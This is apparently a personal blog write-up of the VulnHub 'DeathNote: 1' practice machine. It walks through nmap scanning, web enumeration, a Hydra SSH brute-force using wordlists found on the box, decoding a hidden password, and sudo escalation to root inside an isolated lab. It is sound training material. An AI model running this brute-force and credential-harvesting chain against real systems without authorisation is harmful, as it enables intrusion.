![deathnote4](https://hackmd.io/_uploads/HkIRPr7DA.gif)

**Hello, fr13nds**

# VULNHUB DEATHNOTE: 1 WALKTHROUGH

This is my first article, in which I'll ***pwn*** the machine ***DeathNote: 1*** from VulnHub. ``DeathNote: 1`` is a beginner-friendly vulnerable machine hosted on VulnHub, a platform that provides intentionally vulnerable systems for practising offensive security. It's an easy box themed on the anime ``Death Note``. For more information about the machine, check [DeathNote: 1](https://www.vulnhub.com/entry/deathnote-1,739/).

Now, let's download the ``.OVA file``. Before you do, make sure you have a hypervisor installed on your operating system, preferably ``Oracle VM VirtualBox``, and a Linux distro already running in ``VirtualBox`` to attack from. For this write-up, I'll use [Kali Linux 2024.3](https://kali.org).

![Screenshot 1](https://hackmd.io/_uploads/Syfl_qzD0.png)

After downloading the ``.OVA file``, open ``VirtualBox``, select ``File`` at the top left, then click ``Import Appliance``, as shown in the screenshot below:

![Screenshot 2](https://hackmd.io/_uploads/S1LYK9zw0.jpg)

On clicking ``Import Appliance``, navigate to the downloaded ``OVA file`` and select it. Follow the on-screen instructions and leave everything as default. More importantly, put the ``DeathNote`` machine on the same virtual network as the attacking machine, ``Kali Linux``; in my case that is a ``NAT Network``. This lets the two VMs talk to each other as if they were on a physical LAN, while keeping the deliberately vulnerable box off your real network (a bridged adapter would expose it to everything else on your LAN).

![Screenshot 4](https://hackmd.io/_uploads/HyOQC9GPR.png)

Congratulations! We are done with the configuration. Now, let's start both machines and head over to Kali to begin hacking...
![hacking](https://hackmd.io/_uploads/B1PQKH7PC.gif)

### Target Identification

Let's get the IP address of the target, the ``deathnote`` machine, using the ``netdiscover`` utility on Kali Linux. It works at the ARP level, so it only finds hosts on the same virtual network as Kali, which is exactly what we configured.

```
┌──(g0df4th3r㉿kali)-[~/vulnhub/deathnote]
└─$ sudo netdiscover
```

![Screenshot (deathnote1)](https://hackmd.io/_uploads/SyTdryVwC.png)

*The IP address of the target is 192.168.10.9*

### Initial Enumeration & Service Enumeration

Next, we run a basic nmap scan to enumerate open ports and service versions. Note that ``-sV`` on its own only probes nmap's 1000 most common TCP ports; on a real engagement you would follow up with a full ``-p-`` sweep, but for this box the default set is enough.

```
┌──(g0df4th3r㉿kali)-[~/vulnhub/deathnote]
└─$ nmap -sV 192.168.10.9
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-03 12:09 WAT
Nmap scan report for 192.168.10.9
Host is up (0.47s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
MAC Address: 08:00:27:83:9C:59 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.15 seconds
```

*From the nmap scan, we see SSH and HTTP open on ports 22 and 80 respectively.*

Next, we enumerate the web server by opening ``http://<IP address of the target machine>`` in the browser. Doing this, we get an error: the site redirects to a hostname that Kali cannot resolve (WordPress stores its site address as a hostname and sends it back in the redirect, so you will see the name it expects in the browser's address bar or in the response's ``Location`` header). To fix that, edit the ``/etc/hosts`` file on Kali:

```
┌──(g0df4th3r㉿kali)-[~/vulnhub/deathnote]
└─$ sudo nano /etc/hosts
```

Then add a line mapping the target's IP address to that hostname. Refresh the page and you should get a WordPress site.

![Screenshot (deathnote2)](https://hackmd.io/_uploads/Bk0hBkEDR.png)

The web page gives us a lot of information, some of which may be useful; it's up to us to figure out what. We get two possible usernames, ``kira`` and ``L``.
Clicking the ``Hint`` icon takes us to another page, ``a hint page``. There we see ``FInd a notes.txt file on server`` or ``See the L comment``. Scrolling further, we find a possible password in a comment made by ``L``.

![Screenshot (deathnote3)](https://hackmd.io/_uploads/SJ1gLyVPR.png)

![Screenshot (deathnote4)](https://hackmd.io/_uploads/BJW7IkEvA.png)

This is some useful information. Let's dig further. ==Good reconnaissance is key in exploitation==.

Now, let's check the ``/robots.txt`` path. It reveals another path, ``/important.jpg``. I thought to myself, this path must be nice, but haha, nothing much there, just additional information about our target. ``PS: despite the .jpg extension, the file is not an image but plain text.``

![Screenshot (deathnote5)](https://hackmd.io/_uploads/Bkg581NDC.png)

We use ``curl`` to fetch ``important.jpg`` (a browser would try to render it as an image and fail):

```
┌──(g0df4th3r㉿kali)-[~/vulnhub/deathnote]
└─$ curl http://192.168.10.9/important.jpg

i am Soichiro Yagami, light's father
i have a doubt if L is true about the assumption that light is kira
i can only help you by giving something important

login username : user.txt
i don't know the password.
find it by yourself
but i think it is in the hint section of site
```

Together with the hint page, this tells us that ``user.txt`` can be used as a username list and ``notes.txt`` as a password list.

Now, let's go back to the WordPress site and right-click to ``View Page Source`` to see if we get any leads. In the page source, we find the directory ``/wordpress/wp-content/uploads/2021/07``. Let's go ahead and check it out!

![Screenshot (deathnote6)](https://hackmd.io/_uploads/BJfRLyEv0.png)

![Screenshot (deathnote7)](https://hackmd.io/_uploads/HJUew1VDR.png)

Browsing to it, we find the two files, ``notes.txt`` and ``user.txt``.
``notes.txt``:

```
death4
death4life
death4u
death4ever
death4all
death420
death45
death4love
death49
death48
death456
death4014
1death4u
yaydeath44
thedeath4u2
thedeath4u
stickdeath420
reddeath44
megadeath44
megadeath4
killdeath405
hot2death4sho
death4south
death4now
death4l0ve
death4free
death4elmo
death4blood
death499Eyes301
death498
death4859
death47
death4545
death445
death444
death4387n
death4332387
death42521439
death42
death4138
death411
death405
death4me
```

``user.txt``:

```
KIRA
L
ryuk
rem
misa
siochira
light
takada
near
mello
l
kira
RYUK
REM
SIOCHIRA
LIGHT
NEAR
```

Now, this is some useful information. We will use these two lists to brute-force the SSH login on the target with ``Hydra``, a popular network login brute-forcer (unlike an offline hash cracker, it actually attempts each username/password pair against the live service).

```
┌──(g0df4th3r㉿kali)-[~/Desktop]
└─$ hydra -L user.txt -P notes.txt ssh://192.168.10.9
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-07-04 08:30:51
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 792 login tries (l:18/p:44), ~50 tries per task
[DATA] attacking ssh://192.168.10.9:22/
[STATUS] 235.00 tries/min, 235 tries in 00:01h, 560 to do in 00:03h, 13 active
[22][ssh] host: 192.168.10.9   login: l   password: death4me
```

We got a valid username/password pair: ``l`` / ``death4me``. That is some good news! Let's go ahead and SSH into the target, but before we do, let's go through the command.

#### Explanation of the command

``-L user.txt`` : Specifies the file ``user.txt`` containing the list of usernames to try.

``-P notes.txt`` : Specifies the file ``notes.txt`` containing the list of passwords to try.

``ssh://192.168.10.9`` : The target service (SSH) and the IP address of the target machine.

Hydra's own warning is worth heeding: OpenSSH caps the number of concurrent unauthenticated connections (``MaxStartups``), so the default of 16 parallel tasks can get connections dropped and make the run slower or less reliable; ``-t 4`` is the safer setting against SSH.
```
┌──(g0df4th3r㉿kali)-[~/Desktop]
└─$ ssh l@192.168.10.9
l@192.168.10.9's password:
Linux deathnote 4.19.0-17-amd64 #1 SMP Debian 4.19.194-2 (2021-06-21) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Jul  3 18:39:29 2024 from 192.168.10.4
l@deathnote:~$ whoami
l
```

We successfully logged in. Now, let's list the files in ``l``'s home directory to see if there is any low-hanging fruit. We get a text file, ``user.txt``. Its content is a program in the esoteric language ``Brainfuck`` (the tell-tale sign is that it consists only of the eight characters ``+ - < > . , [ ]``).

```
l@deathnote:~$ ls
user.txt
l@deathnote:~$ cat user.txt
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>+++++.<<++.>>+++++++++++.------------.+.+++++.---.<<.>>++++++++++.<<.>>--------------.++++++++.+++++.<<.>>.------------.---.<<.>>++++++++++++++.-----------.---.+++++++..<<.++++++++++++.------------.>>----------.+++++++++++++++++++.-.<<.>>+++++.----------.++++++.<<.>>++.--------.-.++++++.<<.>>------------------.+++.<<.>>----.+.++++++++++.-------.<<.>>+++++++++++++++.-----.<<.>>----.--.+++..<<.>>+.--------.<<.+++++++++++++.>>++++++.--.+++++++++.-----------------.
```

Running it through any free online Brainfuck interpreter gives this message:

```
i think u got the shell , but you wont be able to kill me -kira
```

This doesn't give us anything actionable. The next lead is the ``/opt`` directory: under ``/opt/L/fake-notebook-rule`` we find a ``case.wav`` file and a ``hint``. Despite its name, ``case.wav`` is not audio but a text file holding a string of hex bytes:

```
l@deathnote:/opt/L/fake-notebook-rule$ cat case.wav
63 47 46 7a 63 33 64 6b 49 44 6f 67 61 32 6c 79 59 57 6c 7a 5a 58 5a 70 62 43 41 3d
```

```
l@deathnote:/opt/L/fake-notebook-rule$ cat hint
use cyberchef
```

So ``case.wav`` gives us a hexadecimal string. Let's decode it with CyberChef.
Decoding the hex gives a ``base64`` string; decoding that in turn gives ``passwd : kiraisevil``, as seen in the screenshots below:

![Screenshot (deathnote10)](https://hackmd.io/_uploads/By_rDkED0.png)

![Screenshot (deathnote11)](https://hackmd.io/_uploads/H1VPvJEDA.png)

This looks like the password for the user ``kira``. Let's switch to ``kira``:

```
l@deathnote:/opt/L/fake-notebook-rule$ su -l kira
Password:
kira@deathnote:~$ id
uid=1001(kira) gid=1001(kira) groups=1001(kira),27(sudo)
```

Beautiful! We now have a shell as ``kira``. Note the ``27(sudo)`` in the ``id`` output: on Debian, members of the ``sudo`` group get full sudo rights by default, so privilege escalation is probably already done. Let's confirm with ``sudo -l``:

```
kira@deathnote:~$ sudo -l
[sudo] password for kira:
Matching Defaults entries for kira on deathnote:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User kira may run the following commands on deathnote:
    (ALL : ALL) ALL
kira@deathnote:~$ sudo su -l
```

Awesome! ``kira`` can run any command as any user, so no further work is needed: ``sudo su -l`` gives us a root shell.

```
root@deathnote:~# ls
root.txt
root@deathnote:~# cat root.txt
[ASCII-art banner reading CONGRATS]
##########follow me on twitter###########3
and share this screen shot and tag @KDSAMF
root@deathnote:~#
```

We find ``root.txt``, and its content greets us with ==Congrats==.

Voila! That was easy, right? We gained root and ``pwned`` the DeathNote: 1 machine. The whole chain was credentials left in web-readable files, a second password hidden only behind trivial encoding, and a user already in the ``sudo`` group; none of it needed an exploit. Hope you found this write-up interesting! Thanks for reading.
Cheers :)

Let's connect on [LinkedIn](https://www.linkedin.com/in/gideon-chukwuka)

![anime-hacking](https://hackmd.io/_uploads/H178YyEDC.gif)